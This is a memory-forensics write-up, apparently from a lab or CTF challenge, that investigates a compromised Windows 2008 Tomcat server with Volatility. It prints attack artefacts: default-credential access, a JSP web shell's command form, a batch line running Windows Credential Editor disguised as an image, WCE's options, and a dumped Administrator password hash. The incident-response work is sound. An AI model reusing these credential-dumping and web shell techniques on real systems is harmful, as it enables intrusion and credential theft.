Tomcat shells
Tomcat shells
Web shells memory write up
WIN-CEKM08E74HR-20150611-222930.raw
All I know is that this dump is from a machine running a web server which has been compromised. I don't know how it was compromised, nor do I have any other details about the server itself.
Identify the OS profile Set environment variable 'mem' to /mnt/volatility/DF/WIN-CEKM08E74HR-20150611-222930.raw
$ cd /root/volatility
$ mem=/mnt/volatility/DF/WIN-CEKM08E74HR-20150611-222930.raw
$ python vol.py -f $mem imageinfo
Volatility results
Volatility Foundation Volatility Framework 2.6.1
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : VistaSP1x86, Win2008SP1x86, Win2008SP2x86, VistaSP2x86
AS Layer1 : IA32PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/mnt/volatility/DF/WIN-CEKM08E74HR-20150611-222930.raw)
PAE type : No PAE
DTB : 0x122000L
KDBG : 0x8190ac98L
Number of Processors : 1
Image Type (Service Pack) : 2
KPCR for CPU 0 : 0x8190b800L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2015-06-11 22:29:32 UTC+0000
Image local date and time : 2015-06-11 18:29:32 -0400
Would be reasonable to assume it will be Win2008 based on the 'web server' part of the challenge.
$ python vol.py -f $mem --profile=Win2008SP1x86 pslist
Processes of interest;
0x831f3d90 cmd.exe 3248 1728 0 -------- 0 0 2015-06-11 22:21:49 UTC+0000 2015-06-11 22:21:49 UTC+0000
0x8363c7f0 tasklist.exe 3256 3248 0 -------- 0 0 2015-06-11 22:21:49 UTC+0000 2015-06-11 22:21:49 UTC+0000
0x835f5718 cmd.exe 3520 1728 0 -------- 0 0 2015-06-11 22:24:04 UTC+0000 2015-06-11 22:24:04 UTC+0000
0x830e9d90 cmd.exe 3572 2032 1 17 0 0 2015-06-11 22:25:00 UTC+0000
0x8362fca0 bg.jpg 3580 3572 1 61 0 0 2015-06-11 22:25:00 UTC+0000
0x835eba10 cmd.exe 3604 1728 0 -------- 0 0 2015-06-11 22:25:15 UTC+0000 2015-06-11 22:25:15 UTC+0000
0x836407b0 cmd.exe 3612 1728 0 -------- 0 0 2015-06-11 22:25:24 UTC+0000 2015-06-11 22:25:24 UTC+0000
0x830e2d90 tasklist.exe 3620 3612 0 -------- 0 0 2015-06-11 22:25:24 UTC+0000 2015-06-11 22:25:24 UTC+0000
0x83693bc0 TrustedInstalle 2364 596 3 104 0 0 2015-06-11 22:26:34 UTC+0000
0x832e7020 csrss.exe 2664 2684 8 188 2 0 2015-06-11 22:26:55 UTC+0000
0x83125cd8 winlogon.exe 2732 2684 3 114 2 0 2015-06-11 22:26:55 UTC+0000
0x82a3f530 taskeng.exe 2448 1012 9 226 2 0 2015-06-11 22:27:17 UTC+0000
0x83681610 dwm.exe 2860 1160 3 70 2 0 2015-06-11 22:27:17 UTC+0000
0x837241d8 explorer.exe 2428 2856 17 425 2 0 2015-06-11 22:27:18 UTC+0000
0x83117020 jusched.exe 3056 2428 1 50 2 0 2015-06-11 22:27:18 UTC+0000
0x83632d08 VBoxTray.exe 3060 2428 9 228 2 0 2015-06-11 22:27:18 UTC+0000
0x83201b90 Tomcat7w.exe 2816 2428 2 50 2 0 2015-06-11 22:27:18 UTC+0000
0x83116ad8 wuauclt.exe 3360 1012 2 142 2 0 2015-06-11 22:27:32 UTC+0000
0x8311ec10 cmd.exe 4032 2428 1 19 2 0 2015-06-11 22:29:10 UTC+0000
Server appears to be a Windows 2008 box running Tomcat7. Pull network information
$ python vol.py -f $mem --profile=Win2008SP1x86 netscan
0x1eda4db0 TCPv4 -:8080 58.64.141.245:1057 CLOSED 1728 Tomcat7.exe
Looks like this server is listening on 192.168.56.30. There's a remote connection associated with PID 1728 / Tomcat7.exe This PID is also the PPID for numerous cmd.exe
Let's run pstree to see the family (could also run pstree -v)
$ python vol.py -f $mem --profile=Win2008SP1x86 pstree
0x837241d8:explorer.exe 2428 2856 17 425 2015-06-11 22:27:18 UTC+0000
. 0x83201b90:Tomcat7w.exe 2816 2428 2 50 2015-06-11 22:27:18 UTC+0000
. 0x83117020:jusched.exe 3056 2428 1 50 2015-06-11 22:27:18 UTC+0000
. 0x8311ec10:cmd.exe 4032 2428 1 19 2015-06-11 22:29:10 UTC+0000
. 0x83139650:services.exe 596 520 6 234 2015-06-11 22:05:29 UTC+0000
.. 0x832dc560:Tomcat7.exe 1728 596 28 360 2015-06-11 22:05:56 UTC+0000
... 0x835eba10:cmd.exe 3604 1728 0 ------ 2015-06-11 22:25:15 UTC+0000
... 0x836407b0:cmd.exe 3612 1728 0 ------ 2015-06-11 22:25:24 UTC+0000
.... 0x830e2d90:tasklist.exe 3620 3612 0 ------ 2015-06-11 22:25:24 UTC+0000
... 0x831f3d90:cmd.exe 3248 1728 0 ------ 2015-06-11 22:21:49 UTC+0000
.... 0x8363c7f0:tasklist.exe 3256 3248 0 ------ 2015-06-11 22:21:49 UTC+0000
... 0x835f5718:cmd.exe 3520 1728 0 ------ 2015-06-11 22:24:04 UTC+0000
Dump Tomcat PID memory (1728)
$ python vol.py -f $mem --profile=Win2008SP1x86 memdump -p 1728 -D /mnt/volatility/DF/tomcat-dump/
Strings output 1728.dmp to readable
$ strings -a /mnt/volatility/DF/tomcat-dump/1728.dmp > /mnt/volatility/DF/tomcat-dump/1728strings.txt
COMPUTERNAME=WIN-CEKM08E74HR
ComSpec=C:\Windows\system32\cmd.exe
DFSTRACINGON=FALSE
FP_NO_HOST_CHECK=NO
LOCALAPPDATA=C:
2\config\systemprofile\AppData\Local
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
Path=C:\ProgramData\Oracle\Java\javapath;C:\Wi
:\Windows;C:\Windows\System32\Wbem
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE=
ENTIFIER=x86 Family 6 Model 42 Stepping 7, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=2a07
ProgramData=C:\Program
UvDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Windows\TEMP
TMP=C:\Windows\TEMP
Format
USERDOMAIN=WORKGROUP
USERNAME=WIN-CEKM08E74HR$
USERPROFILE=C:\Windows\system32\config\systemprofile
windir=C:\Windows
"C:\Program Files\Apache Software Foundation\Tomcat 7.0\bin\Tomcat7.exe" //RS//Tomcat7
58.64.141.245 - tomcat [11/Jun/2015:18:07:04 -0400] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=262D313C4A6E085593AF3CAD4F4E7A99 HTTP/1.1" 200 158
58.64.141.245 - - [11/Jun/2015:18:07:27 -0400] "POST /webfiles/ HTTP/1.1" 200 2367
58.64.141.245 - - [11/Jun/2015:18:07:37 -0400] "POST /webfiles/ HTTP/1.1" 200 2460
58.64.141.245 - - [11/Jun/2015:18:07:51 -0400] "POST /webfiles/ HTTP/1.1" 200 2388
58.64.141.245 - - [11/Jun/2015:18:09:26 -0400] "POST /webfiles/ HTTP/1.1" 200 8973
58.64.141.245 - - [11/Jun/2015:18:12:16 -0400] "POST /webfiles/ HTTP/1.1" 200 48896
58.64.141.245 - - [11/Jun/2015:18:12:42 -0400] "POST /webfiles/ HTTP/1.1" 200 2245
58.64.141.245 - - [11/Jun/2015:18:13:16 -0400] "POST /webfiles/ HTTP/1.1" 200 2278
58.64.141.245 - - [11/Jun/2015:18:15:24 -0400] "POST /webfiles/ HTTP/1.1" 200 2261
58.64.141.245 - - [11/Jun/2015:18:15:34 -0400] "POST /webfiles/ HTTP/1.1" 200 5149
58.64.141.245 - - [11/Jun/2015:18:16:31 -0400] "POST /webfiles/ HTTP/1.1" 200 5227
58.64.141.245 - - [11/Jun/2015:18:19:52 -0400] "POST /webfiles/ HTTP/1.1" 200 5149
58.64.141.245 - - [11/Jun/2015:18:21:49 -0400] "POST /webfiles/ HTTP/1.1" 200 5227
58.64.141.245 - - [11/Jun/2015:18:24:04 -0400] "POST /webfiles/ HTTP/1.1" 200 2271
58.64.141.245 - - [11/Jun/2015:18:25:15 -0400] "POST /webfiles/ HTTP/1.1" 200 2271
58.64.141.245 - - [11/Jun/2015:18:25:25 -0400] "POST /webfiles/ HTTP/1.1" 200 5305
Looking for shells
$ cat /mnt/volatility/DF/tomcat-dump/1728strings.txt | grep -i 'post' | more
Let's see when 58.64.141.245 first accessed the web server.
58.64.141.245 - - [08/Jun/2015:19:38:44 -0400] "GET /manager/html HTTP/1.1" 401 2538
$ grep -C10 "58\.64\.141\.245" /mnt/volatility/DF/tomcat-dump/1728strings.txt
58.64.141.245 - - [11/Jun/2015:18:27:51 -0400] "GET /webfiles/?sort=1&downfile=C%3A%5Cinetpub%5Cwwwroot%5Csm.gif HTTP/1.1" 200 975 - - [11/Jun/2015:18:27:37 -0400] "GET /webfiles/?Javascript HTTP/1.1" 200 3714
58.64.141.245 - - [11/Jun/2015:18:27:44 -0400] "GET /webfiles/?sort=1&file=C%3A%5Cinetpub%5Cwwwroot%5Csm.gif HTTP/1.1" 200 972 7:34 -0400] "GET /webfiles/?Javascript HTTP/1.1" 200 3714/1.1" 200 3714 - [11/Jun/2015:18:13:43 -0400] "GET /webfiles/?sort=1&dir=C%3A%5Cinetpub%5Cwwwroot HTTP/1.1" 200 8863
58.64.141.245 - - [11/Jun/2015:18:13:43 -0400] "GET /webfiles/?Javascript HTTP/1.1" 200 3714
Let's focus on the activity around 'GET /webfiles'
$ grep -C10 "GET \/webfiles" /mnt/volatility/DF/tomcat-dump/1728strings.txt
GET /webfiles/?sort=1&file=C%3A%5Cinetpub%5Cwwwroot%5Csm.gif HTTP/1.1
accept:*/**
referer:http://192.168.56.30:8080/webfiles/?sort=1&dir=C%3A%5Cinetpub%5Cwwwroott
accept-language:en-uss
user-agent:Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0))
accept-encoding:gzip, deflatee
host:192.168.56.30:80800
connection:Keep-Alivee
cookie:JSESSIONID=D4BB0A17D08FE321DF87835231D798244
cookie:JSESSIONID=D4BB0A17D08FE321DF87835231D798244
0A17D08FE321DF87835231D798244
--
Accept-Encoding: gzip, deflate
Host: 192.168.56.30:8080
Connection: Keep-Alive
Cookie: JSESSIONID=983D1DF88F7A229E9D2C5DD76804F120
Authorization: Basic dG9tY2F0OnRvbWNhdA==
Authorisation is base64. Let's decode it.
$ echo dG9tY2F0OnRvbWNhdA== | base64 -d
tomcat:tomcat
Found interesting strings in 1728strings.txt
178956:Created by jsp File Browser v.
Let's focus on that.
179973:" <small>jsp File Browser version
179974-C by <a href="http://www.vonloesch.de">www.vonloesch.de</a></small>
179975- </center>
179976-</html>
179977-java/util/zip/ZipFile
246416- <div class="formular">
246417- <form class="formular2" action="/webfiles/" enctype="multipart/form-data" method="POST">
246418- <input type="hidden" name="dir" value="C:\inetpub\wwwroot">
246419- <input type="hidden" name="sort" value="1">
246420- <input type="file" class="textfield" onKeypress="event.cancelBubble=true;" name="myFile">
246421- <input title="Upload selected file to the current working directory
246422-" type="Submit" class="button" name="Submit" value="Upload"
246423- onClick="javascript:popUp('/webfiles/')">
246424- </form>
246425- <form class="formular2" action="/webfiles/" method="POST">
246426- <input type="hidden" name="dir" value="C:\inetpub\wwwroot">
246427- <input type="hidden" name="sort" value="1">
246428- <input type="hidden" name="command" value="">
246429- <input title="Launch command in current directory" type="Submit" class="button" id="but_Lau" name="Submit" value="(L)aunch external program">
246430- </form>
246431- </div>
246432-
246433- <hr>
246434- <center>
246435: <small>jsp File Browser version 1.2 by <a href="http://www.vonloesch.de">www.vonloesch.de</a></small>
246436- </center>
246437-</bo
246438-H7
246439- H7
246440- H7
246441- Wp<
246442-/manager/images/asf-logo.gif
246443-org.apache.catalina.filters.CSRF_NONCE
246444-multipart/form-data; boundary=---------------------------7df134640124
246445-/manager/images/tomcat.gif
246446-org.apache.catalina.filters.CSRF_NONCE=262D313C4A6E085593AF3CAD4F4E7A99
246447-en-us
246448-262D313C4A6E085593AF3CAD4F4E7A99
246449-W/"2066-1431019026000"
246450-36791
246451-Thu, 07 May 2015 17:17:06 GMT
246452-W/"7279-1431019026000"
246453-/manager/html/upload
246454-/manager/html
248751-/webfiles/tml/uploadlogo.gif
248752-sort=1&file=C:\inetpub\wwwroot\sm.gif5Csm.gif3C4A6E085593AF3CAD4F4E7A99
248753-HTTP/1.1 200 OK
248754-Server: Apache-Coyote/1.1
248755-Content-Disposition: inline;filename="sm.gif"
248756-Content-Type: image/gif;charset=ISO-8859-1
248757-Content-Length: 97
248758-Date: Thu, 11 Jun 2015 22:27:44 GMT
248759-Administrator:WIN-CEKM08E74HR:A15153D335C2751F17306D272A9441BB:835FD21AAC32076DF24DC75E0C77144F
248760-pe="hidden" name="dir" value="C:\inetpub\wwwroot">
248761- <input type="hidden" name="sort" value="1">
248762- <input type="hidden" name="command" value="">
248763- <input title="Launch command in current directory" type="Submit" class="button" id="but_Lau" name="Submit" value="(L)aunch external program">
248764- </form>
248765- </div>
248766-
248767- <hr>
248768- <center>
248769: <small>jsp File Browser version 1.2 by <a href="http://www.vonloesch.de">www.vonloesch.de</a></small>
38887- out.write("\t\t<input type=\"hidden\" name=\"command\" value=\"\">\n");
38888- out.write("\t\t<input title=\"Launch command in current directory\" type=\"Submit\" class=\"button\" id=\"but_Lau\" name=\"Submit\" value=\"");
65343- out.write("\t\t<input type=\"hidden\" name=\"command\" value=\"\">\n");
65344- out.write("\t\t<input title=\"Launch command in current directory\" type=\"Submit\" class=\"button\" id=\"but_Lau\" name=\"Submit\" value=\"");
Let's find this shell.
58.64.141.245 - - [11/Jun/2015:18:12:18 -0400] "GET /webfiles/?uplMonitor=C%3A%5Cfakepath%5C12.bat HTTP/1.1" 200 574
$ cat /mnt/volatility/DF/tomcat-dump/1728strings.txt | grep -i '\.bat'
<snip>
at 18:25 c:\windows\12.bat
first&uplMonitor=C%3A%5Cfakepath%5C12.bat
Javascriptonitor=C:\fakepath\12.bat12.bat
C:\fakepath\12.bat
Content-Disposition: form-data; name="myFile"; filename="12.bat"
uplMonitor=C%3A%5Cfakepath%5C12.bat
Javascript=C:\inetpub\wwwrootwwroot12.bat
uplMonitor=C%3A%5Cfakepath%5C12.bat
at 18:25 c:\windows\12.bat
first&uplMonitor=C%3A%5Cfakepath%5C12.bat
C:\fakepath\12.bat
<snip>
GET /webfiles/?first&uplMonitor=C%3A%5Cfakepath%5C12.bat HTTP/1.1
Content-Disposition: form-data; name="myFile"; filename="12.bat"
<snip>
58.64.141.245 - - [11/Jun/2015:18:12:16 -0400] "GET /webfiles/?first&uplMonitor=C%3A%5Cfakepath%5C12.bat HTTP/1.1" 200 865
58.64.141.245 - - [11/Jun/2015:18:12:18 -0400] "GET /webfiles/?uplMonitor=C%3A%5Cfakepath%5C12.bat HTTP/1.1" 200 574
Right. C:\fakepath\12.bat - let's dump this batch script
$ python vol.py -f $mem --profile=Win2008SP1x86 filescan | grep -i "12\.bat"
Volatility Foundation Volatility Framework 2.6.1
0x000000001ee373f8 8 0 -W-rw- \Device\HarddiskVolume1\Windows\12.bat
$ python vol.py -f $mem --profile=Win2008SP1x86 dumpfiles -Q 0x000000001ee373f8 -D /mnt/volatility/DF/tomcat-dump/
Volatility Foundation Volatility Framework 2.6.1
DataSectionObject 0x1ee373f8 None \Device\HarddiskVolume1\Windows\12.bat
Examine 12.bat
$ cat /mnt/volatility/DF/tomcat-dump/file.None.0x8362e730.dat
@echo off
c:\inetpub\wwwroot\bg.jpg -e -o c:\inetpub\wwwroot\sm.gif
pstree verbose
$ python vol.py -f $mem --profile=Win2008SP1x86 pstree -v
..... 0x8362fca0:bg.jpg 3580 3572 1 61 2015-06-11 22:25:00 UTC+0000
audit: \Device\HarddiskVolume1\inetpub\wwwroot\bg.jpg
cmd: c:\inetpub\wwwroot\bg.jpg -e -o c:\inetpub\wwwroot\sm.gif
path: c:\inetpub\wwwroot\bg.jpg
Let's determine what bg.jpg actually is
$ python vol.py -f $mem --profile=Win2008SP1x86 filescan | grep -i 'bg\.jpg'
Volatility Foundation Volatility Framework 2.6.1
0x000000001ede1ba0 8 0 -W-rw- \Device\HarddiskVolume1\inetpub\wwwroot\bg.jpg
0x000000001f2dc170 7 0 R--r-d \Device\HarddiskVolume1\inetpub\wwwroot\bg.jpg
$ sha1sum /mnt/volatility/DF/tomcat-dump/file.*
c0d7899cc49bf2cb4f3abe663dc6a62ed69c06ff /mnt/volatility/DF/tomcat-dump/file.None.0x832c0680.dat
26019082706f9898a716d8803f57cc70365c821b /mnt/volatility/DF/tomcat-dump/file.None.0x8362fb20.img
$ strings file.None.0x8362fb20.img
WCE %s (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Options:
-l List logon sessions and NTLM credentials (default).
Optional: -r<refresh interval>.
-s Changes NTLM credentials of current logon session.
Parameters: <UserName>:<DomainName>:<LMHash>:<NTHash>.
-o saves all output to a file.
-r Lists logon sessions and NTLM credentials indefinitely.
Refreshes every 5 seconds if new sessions are found.
-c Run <cmd> in a new session with the specified NTLM credentials.
Parameters: <cmd>.
-e Lists logon sessions NTLM credentials indefinitely.
Refreshes every time a logon event occurs.
Parameters: <filename>.
-i Specify LUID instead of use current logon session.
Parameters: <luid>.
-d Delete NTLM credentials from logon session.
Parameters: <luid>.
-a Use Addresses.
Parameters: <addresses>
-f Force 'safe mode'.
-g Generate LM & NT Hash.
Parameters: <password>.
-K Dump Kerberos tickets to file (unix & 'windows wce' format)
Error in cmdline!. Bye!.
-k Read Kerberos tickets from file and insert into Windows cache
username wrong format!.
-w Dump cleartext passwords stored by the digest authentication package
-v verbose output.
So it's windows credential editor. -e for credentials, -o for output. Review sm.gif
$ python vol.py -f $mem --profile=Win2008SP1x86 filescan | grep -i 'sm\.gif'
Volatility Foundation Volatility Framework 2.6.1
0x000000001edf6640 1 0 R--rw- \Device\HarddiskVolume1\inetpub\wwwroot\sm.gif
$ python vol.py -f $mem --profile=Win2008SP1x86 dumpfiles -Q 0x000000001edf6640 -D /mnt/volatility/DF/tomcat-dump/wce
Volatility Foundation Volatility Framework 2.6.1
DataSectionObject
0x1edf6640 None \Device\HarddiskVolume1\inetpub\wwwroot\sm.gif
$ strings /mnt/volatility/DF/tomcat-dump/wce/file.None.0x830f1448.dat
Administrator:WIN-CEKM08E74HR:A15153D335C2751F17306D272A9441BB:835FD21AAC32076DF24DC75E0C77144F
Identifying tasks
$ python vol.py -f $mem --profile=Win2008SP1x86 filescan | grep -i 'tasks'
Volatility Foundation Volatility Framework 2.6.1
0x000000001ee03280 1 0 R--r-d \Device\HarddiskVolume1\Windows\System32\Tasks\Microsoft\Windows\NetworkAccessProtection\NAPStatus UI
0x000000001ee49ba8 1 0 R--r-d \Device\HarddiskVolume1\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask
0x000000001f122450 1 0 R--r-d \Device\HarddiskVolume1\Windows\System32\Tasks\Microsoft\Windows\TextServicesFramework\MsCtfMonitor
0x000000001f127f80 1 0 R--r-d \Device\HarddiskVolume1\Windows\System32\Tasks\Microsoft\Windows\Multimedia\SystemSoundsService
0x000000001f1e8bd8 17 1 RW-r-- \Device\HarddiskVolume1\Windows\System32\winevt\Logs\Microsoft-Windows-TaskScheduler%4Operational.evtx
0x000000001f1eb750 8 0 -W-r-- \Device\HarddiskVolume1\Windows\System32\Tasks\At1
0x000000001f22da78 10 1 RW-r-- \Device\HarddiskVolume1\Windows\Tasks\SCHEDLGU.TXT
0x000000001f22e9c8 6 1 R--rw- \Device\HarddiskVolume1\Windows\Tasks
0x000000001f231b18 2 0 R--r-d \Device\HarddiskVolume1\Windows\System32\taskschd.dll
0x000000001f2638d0 1 0 R--r-d \Device\HarddiskVolume1\Windows\System32\Tasks\Microsoft\Windows\PLA\System\ConvertLogEntries
*0x000000001f297ad8 8 0 -W-r-d \Device\HarddiskVolume1\Windows\Tasks\At1.job*
0x000000001f2e7ed0 1 0 R--r-d \Device\HarddiskVolume1\Windows\System32\Tasks\Microsoft\Windows\Server Manager\ServerManager
$ python vol.py -f $mem --profile=Win2008SP1x86 dumpfiles -Q 0x000000001f297ad8 -D /mnt/volatility/DF/tomcat-dump/tasks
$ strings -el /mnt/volatility/DF/tomcat-dump/tasks/file.None.0x8363fd10.dat
c:\windows\12.bat
SYSTEM
Created by NetScheduleJobAdd.
$ xxd /mnt/volatility/DF/tomcat-dump/tasks/file.None.0x8363fd10.dat
00000000: 0006 0100 7cbf 6c48 bcaa 564e 928f 06eb ....|.lH..VN....
00000010: 7057 4ccb 4600 ca00 0000 0000 3c00 0a00 pWL.F.......<...
00000020: 2000 0000 0014 730f 0000 0000 0113 0400 .....s.........
00000030: 0200 e021 df07 0600 0400 0b00 1200 1900 ...!............
00000040: 0000 1c00 0100 1200 6300 3a00 5c00 7700 ........c.:.\.w.
00000050: 6900 6e00 6400 6f00 7700 7300 5c00 3100 i.n.d.o.w.s.\.1.
00000060: 3200 2e00 6200 6100 7400 0000 0000 0000 2...b.a.t.......
00000070: 0700 5300 5900 5300 5400 4500 4d00 0000 ..S.Y.S.T.E.M...
00000080: 1e00 4300 7200 6500 6100 7400 6500 6400 ..C.r.e.a.t.e.d.
00000090: 2000 6200 7900 2000 4e00 6500 7400 5300 .b.y. .N.e.t.S.
000000a0: 6300 6800 6500 6400 7500 6c00 6500 4a00 c.h.e.d.u.l.e.J.
000000b0: 6f00 6200 4100 6400 6400 2e00 0000 0000 o.b.A.d.d.......
000000c0: 0800 0000 0000 0000 0000 0100 3000 0000 ............0...
000000d0: df07 0600 0b00 0000 0000 0000 1200 1900 ................
000000e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000000f0: 0000 0000 0000 0000 0000 0000 0100 0100 ................
00000100: 3c56 fcbd fe46 561b 1843 6c37 2c42 d847 <V...FV..Cl7,B.G
00000110: 8146 13f0 4dc0 8ca1 6385 9699 3525 f122 .F..M...c...5%."
00000120: a49a 20ed 4b99 5850 df79 17f8 0f16 4777 .. .K.XP.y....Gw
00000130: b394 0b70 a307 7bd4 993b a5d4 71a0 0a19 ...p..{..;..q...
Dump security logs to identify who created scheduled task
$ python vol.py -f $mem --profile=Win2008SP1x86 filescan | grep -i 'security'
Volatility Foundation Volatility Framework 2.6.1
0x000000001ee09960 3 1 RW---- \Device\HarddiskVolume1\Windows\System32\config\RegBack\SECURITY
0x000000001f091600 11 1 RW---- \Device\HarddiskVolume1\Windows\System32\config\SECURITY
0x000000001f1ed2c0 13 1 RW-r-- \Device\HarddiskVolume1\Windows\System32\winevt\Logs\Security.evtx
0x000000001fa06ed8 1 1 RW---- \Device\HarddiskVolume1\Windows\System32\config\SECURITY.LOG1
0x000000001fa31308 17 1 RWDr-d \Device\HarddiskVolume1\Windows\System32\LogFiles\WMI\RtBackup\EtwRTEventlog-Security.etl
0x000000001fa31b00 1 1 RW---- \Device\HarddiskVolume1\Windows\System32\config\SECURITY.LOG2
0x000000001fa37a60 1 1 RW-r-d \Device\HarddiskVolume1\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Configuration-Wizard%4Operational.etl
0x000000001fa37b08 1 1 RW-r-d \Device\HarddiskVolume1\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Configuration-Wizard%4Diagnostic.etl
$ python vol.py -f $mem --profile=Win2008SP1x86 dumpfiles -Q 0x000000001f1ed2c0 -D /mnt/volatility/DF/tomcat-dump/security-log/
Volatility Foundation Volatility Framework 2.6.1
DataSectionObject 0x1f1ed2c0 None \Device\HarddiskVolume1\Windows\System32\winevt\Logs\Security.evtx
SharedCacheMap 0x1f1ed2c0 None \Device\HarddiskVolume1\Windows\System32\winevt\Logs\Security.evtx
Renamed file.None.0x831ef6a0.vacb to file.None.0x831ef6a0.vacb.evtx Opened in Event Viewer, refined by ID 4698 (new scheduled task has been created)
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-a5ba-3e3b0328c30d}" />
<EventID>4698</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-06-11T22:13:16.426336000Z" />
<EventRecordID>7273</EventRecordID>
<Correlation />
<Execution ProcessID="608" ThreadID="2268" />
<Channel>Security</Channel>
<Computer>WIN-CEKM08E74HR</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-18</Data>
<Data Name="SubjectUserName">WIN-CEKM08E74HR$</Data>
<Data Name="SubjectDomainName">WORKGROUP</Data>
<Data Name="SubjectLogonId">0x3e7</Data>
<Data Name="TaskName">\At1</Data>
<Data Name="TaskContent"><?xml version="1.0" encoding="UTF-16"?>
<Task version="1.0" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo /> <Triggers> <TimeTrigger> <StartBoundary>2015-06-11T18:25:00</StartBoundary> </TimeTrigger> </Triggers> <Principals> <Principal id="Author"> <UserId>@AtServiceAccount</UserId> <LogonType>InteractiveTokenOrPassword</LogonType> <RunLevel>HighestAvailable</RunLevel> </Principal> </Principals> <Actions Context="Author"> <Exec> <Command>c:\windows\12.bat</Command> </Exec> </Actions> </Task></Data>
</EventData>
</Event>
Executive Summary
We have a Tomcat7 installation on a Windows 2008 server. Access was gained with default tomcat credentials (tomcat/tomcat). A file was uploaded which provided SYSTEM level access. Windows Credential Editor (WCE) was uploaded, a scheduled task was created which executed WCE and dumped local credentials into a single file. The attacker downloaded that file remotely, gaining access to the local Administrator account credentials. All attacks took place on 11th June 2015 from the IP 58.64.141.245
Last updated
Was this helpful?